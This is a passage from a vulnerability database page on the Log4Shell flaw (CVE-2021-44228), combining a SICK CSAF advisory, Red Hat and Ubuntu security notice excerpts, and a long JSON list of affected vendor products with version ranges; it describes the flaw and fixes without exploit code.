"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0" }, "products": [ "CSAFPID-0001" ] } ] } ] }
sca-2021-0003
Vulnerability from csaf_sick
Notes
{ "document": { "category": "csaf_security_advisory", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE", "url": "https://www.first.org/tlp/" } }, "lang": "en-US", "notes": [ { "category": "general", "text": "As general security measures, SICK recommends to minimize network exposure of the devices, restrict network access and follow recommended security practices in order to run the devices in a protected IT environment.", "title": "General Security Measures" }, { "category": "general", "text": "SICK performs vulnerability classification by using the CVSS scoring system (*CVSS v3.1*). The environmental score is dependent on the customer\u2019s environment and can affect the overall CVSS score. SICK recommends that customers individually evaluate the environmental score to achieve final scoring.", "title": "Vulnerability Classification" } ], "publisher": { "category": "vendor", "contact_details": "psirt@sick.de", "issuing_authority": "SICK PSIRT is responsible for any vulnerabilities related to SICK products.", "name": "SICK PSIRT", "namespace": "https://sick.com/psirt" }, "references": [ { "summary": "SICK PSIRT Security Advisories", "url": "https://sick.com/psirt" }, { "summary": "SICK Operating Guidelines", "url": "https://cdn.sick.com/media/docs/1/11/411/Special_information_CYBERSECURITY_BY_SICK_en_IM0084411.PDF" }, { "summary": "ICS-CERT recommended practices on Industrial Security", "url": "http://ics-cert.us-cert.gov/content/recommended-practices" }, { "summary": "CVSS v3.1 Calculator", "url": "https://www.first.org/cvss/calculator/3.1" }, { "category": "self", "summary": "The canonical URL.", "url": "https://www.sick.com/.well-known/csaf/white/2021/sca-2021-0003.json" } ], "title": "SICK Security Advisory for Apache Log4j (CVE-2021-44228)", "tracking": { "aliases": [ "LOG4SHELL" ], "current_release_date": "2021-12-17T12:00:00.000Z", "generator": { "date": "2023-02-10T07:41:23.369Z", "engine": { "name": "Secvisogram", "version": "2.0.0" } }, 
"id": "SCA-2021-0003", "initial_release_date": "2021-12-14T17:00:00.000Z", "revision_history": [ { "date": "2021-12-14T17:00:00.000Z", "number": "1", "summary": "Initial Release" }, { "date": "2021-12-16T17:00:00.000Z", "number": "2", "summary": "Updated affected products" }, { "date": "2021-12-17T12:00:00.000Z", "number": "3", "summary": "Updated affected versions" }, { "date": "2022-01-14T13:00:00.000Z", "number": "4", "summary": "Updated affected products" }, { "date": "2022-01-19T11:00:00.000Z", "number": "5", "summary": "Updated affected products" }, { "date": "2022-02-17T11:00:00.000Z", "number": "6", "summary": "Updated affected products" }, { "date": "2023-02-10T11:00:00.000Z", "number": "7", "summary": "Updated Advisory (only visual changes)" } ], "status": "final", "version": "7" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "\u003c1.5.3", "product": { "name": "SICK FieldEcho \u003c1.5.3", "product_id": "CSAFPID-0001", "product_identification_helper": { "skus": [ "1612993" ], "x_generic_uris": [ { "namespace": "SICK:Website", "uri": "SICK:Website:https://www.sick.com/de/de/p/p597264" } ] } } } ], "category": "product_name", "name": "FieldEcho" }, { "branches": [ { "category": "product_version_range", "name": "\u003c1.4.1", "product": { "name": "SICK Function Block Factory \u003c1.4.1", "product_id": "CSAFPID-0002", "product_identification_helper": { "x_generic_uris": [ { "namespace": "SICK:Website", "uri": "SICK:Website:https://www.sick.com/de/de/p/p653518" } ] } } } ], "category": "product_name", "name": "Function Block Factory" }, { "branches": [ { "category": "product_version_range", "name": "\u003c1.5.0", "product": { "name": "SICK AppManager \u003c1.5.0", "product_id": "CSAFPID-0003", "product_identification_helper": { "x_generic_uris": [ { "namespace": "SICK:Website", "uri": "SICK:Website:https://www.sick.com/de/de/p/p532784" } ] } } } ], "category": "product_name", "name": 
"AppManager" }, { "branches": [ { "category": "product_version_range", "name": "\u003c1.2.2", "product": { "name": "SICK FieldEcho Dashboard \u003c1.2.2", "product_id": "CSAFPID-0004", "product_identification_helper": { "x_generic_uris": [ { "namespace": "SICK:Website", "uri": "SICK:Website:https://www.sick.com/de/de/p/p651603" } ] } } } ], "category": "product_name", "name": "FieldEcho Dashboard" }, { "branches": [ { "category": "product_version_range", "name": "\u003c3.6.0", "product": { "name": "SICK AppStudio \u003c3.6.0", "product_id": "CSAFPID-0005", "product_identification_helper": { "skus": [ "1610199" ], "x_generic_uris": [ { "namespace": "SICK:Website", "uri": "SICK:Website:https://www.sick.com/de/de/p/p448644" } ] } } } ], "category": "product_name", "name": "AppStudio" } ], "category": "vendor", "name": "SICK AG" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-44228", "cwe": { "id": "CWE-502", "name": "Deserialization of Untrusted Data" }, "notes": [ { "category": "summary", "text": "A critical remote code execution vulnerability impacting at least Apache Log4j 2 (versions 2.0 to 2.14.1) was recently announced by Apache. This vulnerability is designated by Mitre as CVE-2021-44228 with the highest severity rating of 10.0. The vulnerability is also known as Log4Shell by security \nresearchers. 
If exploited, this vulnerability allows adversaries to potentially take full control of the impacted system.\nLog4j 2 is a commonly used open source third party Java logging library used in software applications and services.", "title": "Summary" } ], "product_status": { "fixed": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "Apache Security Advisory", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "CVE Entry", "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228" } ], "remediations": [ { "category": "vendor_fix", "details": "Fixed on vendorside", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004" ] } ] } ] }
var-202112-0566
Vulnerability from variot
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
JIRA issues fixed (https://issues.jboss.org/):
LOG-1971 - Applying cluster state is causing elasticsearch to hit an issue and become unusable
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
====================================================================
Red Hat Security Advisory
Synopsis: Critical: Red Hat AMQ Streams 1.6.5 release and security update
Advisory ID: RHSA-2021:5133-01
Product: Red Hat JBoss AMQ
Advisory URL: https://access.redhat.com/errata/RHSA-2021:5133
Issue date: 2021-12-14
CVE Names: CVE-2021-44228
====================================================================
1. Summary:
Red Hat AMQ Streams 1.6.5 is now available from the Red Hat Customer Portal.
Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency.
This release of Red Hat AMQ Streams 1.6.5 serves as a replacement for Red Hat AMQ Streams 1.6.4, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.
Security Fix(es):
- log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.
The References section of this erratum contains a download link (you must log in to download the update).
- Bugs fixed (https://bugzilla.redhat.com/):
2030932 - CVE-2021-44228 log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value
- References:
https://access.redhat.com/security/cve/CVE-2021-44228
https://access.redhat.com/security/updates/classification/#critical
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.streams&version=1.6.5
https://access.redhat.com/security/vulnerabilities/RHSB-2021-009
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc.
Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java applications based on the WildFly application runtime.
=========================================================================
Ubuntu Security Notice USN-5192-2
December 17, 2021
apache-log4j2 vulnerability
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 16.04 ESM
Summary:
Apache Log4j 2 could be made to crash or run programs as an administrator if it received a specially crafted input. This update provides the corresponding update for Ubuntu 16.04 ESM.
Original advisory details:
Chen Zhaojun discovered that Apache Log4j 2 allows remote attackers to run programs via specially crafted input. An attacker could use this vulnerability to cause a denial of service or possibly execute arbitrary code.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 16.04 ESM: liblog4j2-java 2.4-2ubuntu0.1~esm1
In general, a standard system update will make all the necessary changes.
The purpose of this text-only errata is to inform you about the security issues fixed in this release.
Installation instructions are available from the Fuse product documentation pages:
Fuse 7.8: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/installing_on_apache_karaf/apply-hotfix-patch https://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/deploying_into_spring_boot/patch-red-hat-fuse-applications
Fuse 7.9: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/installing_on_apache_karaf/apply-hotfix-patch https://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/deploying_into_spring_boot/patch-red-hat-fuse-applications
Fuse 7.10: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/installing_on_apache_karaf/apply-hotfix-patch https://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/deploying_into_spring_boot/patch-red-hat-fuse-applications
- VMware Unified Access Gateway
- VMware Carbon Black Workload Appliance
- VMware Site Recovery Manager, vSphere Replication
- VMware Tanzu GemFire
- VMware Tanzu GemFire for VMs
- VMware Tanzu Operations Manager
- VMware Tanzu Application Service for VMs
- VMware Horizon Agents Installer
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-202112-0566", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "prime service catalog", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "12.1" }, { "model": "unified intelligence center", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.6\\(2\\)" }, { "model": "vesys", "scope": "lt", "trust": 
1.0, "vendor": "siemens", "version": "2019.1" }, { "model": "firepower threat defense", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "6.5.0" }, { "model": "spectrum power 7", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "2.30" }, { "model": "paging server", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "8.5\\(1\\)" }, { "model": "network services orchestrator", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "5.5.4.1" }, { "model": "packaged contact center enterprise", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "11.6" }, { "model": "crosswork data gateway", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2.0.2" }, { "model": "network services orchestrator", "scope": "gte", "trust": 1.0, "vendor": "cisco", "version": "5.5" }, { "model": "ucs director", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "6.8.2.0" }, { "model": "crosswork optimization engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "3.0.0" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.6\\(2\\)" }, { "model": "evolved programmable network manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "4.0" }, { "model": "webex meetings server", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "3.0" }, { "model": "xpedition enterprise", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": null }, { "model": "wan automation engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "7.2.3" }, { "model": "log4j", "scope": "lt", "trust": 1.0, "vendor": "apache", "version": "2.12.2" }, { "model": "video surveillance manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "7.14\\(3.025\\)" }, { "model": "optical network controller", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "1.1.0" }, { "model": "system debugger", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": 
null }, { "model": "unified workforce optimization", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1\\)" }, { "model": "common services platform collector", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "002.009\\(000.001\\)" }, { "model": "network dashboard fabric controller", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.3\\(1\\)" }, { "model": "siveillance vantage", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "*" }, { "model": "sd-wan vmanage", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "20.6" }, { "model": "network services orchestrator", "scope": "gte", "trust": 1.0, "vendor": "cisco", "version": "5.6" }, { "model": "evolved programmable network manager", "scope": "lte", "trust": 1.0, "vendor": "cisco", "version": "4.1.1" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.5\\(1\\)" }, { "model": "crosswork zero touch provisioning", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "3.0.0" }, { "model": "emergency responder", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(4.65000.14\\)" }, { "model": "unified contact center express", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "12.5\\(1\\)" }, { "model": "dna center", "scope": "gte", "trust": 1.0, "vendor": "cisco", "version": "2.2.2.0" }, { "model": "crosswork network automation", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": null }, { "model": "fxos", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "6.3.0" }, { "model": "cloudcenter suite", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "5.4\\(1\\)" }, { "model": "unified customer voice portal", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.6\\(1\\)" }, { "model": "unified communications manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1.18900.97\\)" }, { "model": "data center network 
manager", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "11.3\\(1\\)" }, { "model": "emergency responder", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(4.66000.14\\)" }, { "model": "smart phy", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "3.1.5" }, { "model": "customer experience cloud agent", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "1.12.1" }, { "model": "smart phy", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "3.1.2" }, { "model": "network services orchestrator", "scope": "gte", "trust": 1.0, "vendor": "cisco", "version": "5.4" }, { "model": "firepower threat defense", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "6.7.0" }, { "model": "network services orchestrator", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "5.4.5.2" }, { "model": "ucs central software", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.0\\(1l\\)" }, { "model": "cyber vision sensor management extension", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "4.0.3" }, { "model": "wan automation engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "7.3" }, { "model": "snapcenter", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "fxos", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "6.4.0" }, { "model": "unified communications manager im \\\u0026 presence service", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1\\)" }, { "model": "network dashboard fabric controller", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.0\\(1\\)" }, { "model": "e-car operation center", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "2021-12-13" }, { "model": "sd-wan vmanage", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "20.7" }, { "model": "desigo cc info center", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "5.1" }, { "model": "virtualized 
infrastructure manager", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "3.4.4" }, { "model": "intersight virtual appliance", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "1.0.9-361" }, { "model": "network insights for data center", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "6.0\\(2.1914\\)" }, { "model": "vm access proxy", "scope": "lt", "trust": 1.0, "vendor": "snowsoftware", "version": "3.6" }, { "model": "ucs central software", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.0\\(1c\\)" }, { "model": "virtualized infrastructure manager", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "3.2.0" }, { "model": "wan automation engine", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "7.3.0.2" }, { "model": "unified contact center enterprise", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "11.6\\(2\\)" }, { "model": "packaged contact center enterprise", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.6\\(1\\)" }, { "model": "connected analytics for network deployment", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "007.003.003" }, { "model": "crosswork platform infrastructure", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "4.0.1" }, { "model": "energyip", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "8.5" }, { "model": "cloudcenter cost optimizer", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "5.5.2" }, { "model": "virtualized infrastructure manager", "scope": "gte", "trust": 1.0, "vendor": "cisco", "version": "3.4.0" }, { "model": "network dashboard fabric controller", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(2\\)" }, { "model": "captial", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "2019.1" }, { "model": "unity connection", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5" }, { "model": "firepower threat defense", "scope": "eq", "trust": 1.0, 
"vendor": "cisco", "version": "7.1.0" }, { "model": "sipass integrated", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "2.85" }, { "model": "sd-wan vmanage", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "20.5.1.1" }, { "model": "identity services engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "003.001\\(000.518\\)" }, { "model": "oncommand insight", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "optical network controller", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "1.1" }, { "model": "unified contact center express", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.6\\(2\\)" }, { "model": "video surveillance manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "7.14\\(4.018\\)" }, { "model": "paging server", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "14.4.1" }, { "model": "integrated management controller supervisor", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2.3.2.1" }, { "model": "paging server", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "8.3\\(1\\)" }, { "model": "nx", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "*" }, { "model": "network assurance engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "6.0\\(2.1912\\)" }, { "model": "unified customer voice portal", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.0\\(1\\)" }, { "model": "firepower threat defense", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "6.2.3" }, { "model": "log4j", "scope": "lt", "trust": 1.0, "vendor": "apache", "version": "2.15.0" }, { "model": "virtual topology system", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.6.6" }, { "model": "paging server", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "9.0\\(1\\)" }, { "model": "identity services engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.4.0" }, { 
"model": "unified sip proxy", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "010.002\\(000\\)" }, { "model": "wan automation engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "7.6" }, { "model": "unified communications manager", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1\\)" }, { "model": "navigator", "scope": "lt", "trust": 1.0, "vendor": "siemens", "version": "2021-12-13" }, { "model": "sd-wan vmanage", "scope": "gte", "trust": 1.0, "vendor": "cisco", "version": "20.5" }, { "model": "mobility services engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": null }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.0\\(1\\)" }, { "model": "unified communications manager im and presence service", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1\\)" }, { "model": "network dashboard fabric controller", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.2\\(1\\)" }, { "model": "sd-wan vmanage", "scope": "gte", "trust": 1.0, "vendor": "cisco", "version": "20.4" }, { "model": "virtual topology system", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2.6.7" }, { "model": "cyber vision sensor management extension", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "4.0.2" }, { "model": "sppa-t3000 ses3000", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "*" }, { "model": "connected analytics for network deployment", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "007.000.001" }, { "model": "energyip", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "9.0" }, { "model": "opcenter intelligence", "scope": "lte", "trust": 1.0, "vendor": "siemens", "version": "3.2" }, { "model": "business process automation", "scope": "gte", "trust": 1.0, "vendor": "cisco", "version": "3.2.000.000" }, { "model": "broadworks", "scope": "eq", "trust": 1.0, "vendor": "cisco", 
"version": null }, { "model": "evolved programmable network manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "5.0" }, { "model": "wan automation engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "7.1.3" }, { "model": "cloud secure agent", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "siveillance identity", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "1.6" }, { "model": "connected analytics for network deployment", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "008.000.000" }, { "model": "wan automation engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "7.2.1" }, { "model": "unified intelligence center", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "12.6\\(1\\)" }, { "model": "contact center domain manager", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "12.5\\(1\\)" }, { "model": "active iq unified manager", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "common services platform collector", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "002.009\\(000.000\\)" }, { "model": "network dashboard fabric controller", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.1\\(1\\)" }, { "model": "energy engage", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "3.1" }, { "model": "enterprise chat and email", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "12.0\\(1\\)" }, { "model": "evolved programmable network manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "3.1" }, { "model": "crosswork network automation", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.0.0" }, { "model": "dna center", "scope": "gte", "trust": 1.0, "vendor": "cisco", "version": "2.2.3.0" }, { "model": "rhythmyx", "scope": "lte", "trust": 1.0, "vendor": "percussion", "version": "7.3.2" }, { "model": "cx cloud agent", "scope": "eq", "trust": 1.0, 
"vendor": "cisco", "version": "001.012" }, { "model": "identity services engine", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "002.007\\(000.356\\)" }, { "model": "common services platform collector", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2.9.1.3" }, { "model": "firepower threat defense", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "6.3.0" }, { "model": "unified customer voice portal", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.6\\(1\\)" }, { "model": "smart phy", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "3.1.4" }, { "model": "computer vision annotation tool", "scope": "eq", "trust": 1.0, "vendor": "intel", "version": null }, { "model": "unified customer voice portal", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.5" }, { "model": "energyip", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "8.6" }, { "model": "unified contact center express", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.6\\(1\\)" }, { "model": "crosswork zero touch provisioning", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "2.0.1" }, { "model": "cloudcenter suite admin", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "5.3.1" }, { "model": "connected analytics for network deployment", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "008.000.000.000.004" }, { "model": "unified contact center enterprise", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.6\\(1\\)" }, { "model": "unified customer voice portal", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.0" }, { "model": "nexus insights", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "6.0.2" }, { "model": "unified sip proxy", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "10.2.1v2" }, { "model": "desigo cc info center", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "5.0" }, { "model": "finesse", "scope": 
"lt", "trust": 1.0, "vendor": "cisco", "version": "12.6\\(1\\)" }, { "model": "connected analytics for network deployment", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "7.3" }, { "model": "firepower threat defense", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "6.4.0" }, { "model": "connected analytics for network deployment", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "006.005.000." }, { "model": "unified customer voice portal", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "11.6" }, { "model": "sd-wan vmanage", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "20.6.2.1" }, { "model": "evolved programmable network manager", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "5.1" }, { "model": "unified workforce optimization", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "11.5\\(1\\)" }, { "model": "smart phy", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "3.2.1" }, { "model": "desigo cc advanced reports", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "4.0" }, { "model": "business process automation", "scope": "lt", "trust": 1.0, "vendor": "cisco", "version": "3.2.000.009" }, { "model": "ucs central software", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.0\\(1e\\)" }, { "model": "paging server", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "9.0\\(2\\)" }, { "model": "siguard dsa", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "4.2" }, { "model": "ucs central software", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.0\\(1d\\)" }, { "model": "finesse", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "12.6\\(1\\)" }, { "model": "ucs central software", "scope": "eq", "trust": 1.0, "vendor": "cisco", "version": "2.0\\(1a\\)" }, { "model": "solid edge harness design", "scope": "eq", "trust": 1.0, "vendor": "siemens", "version": "2020" }, { "model": "solid edge harness design", 
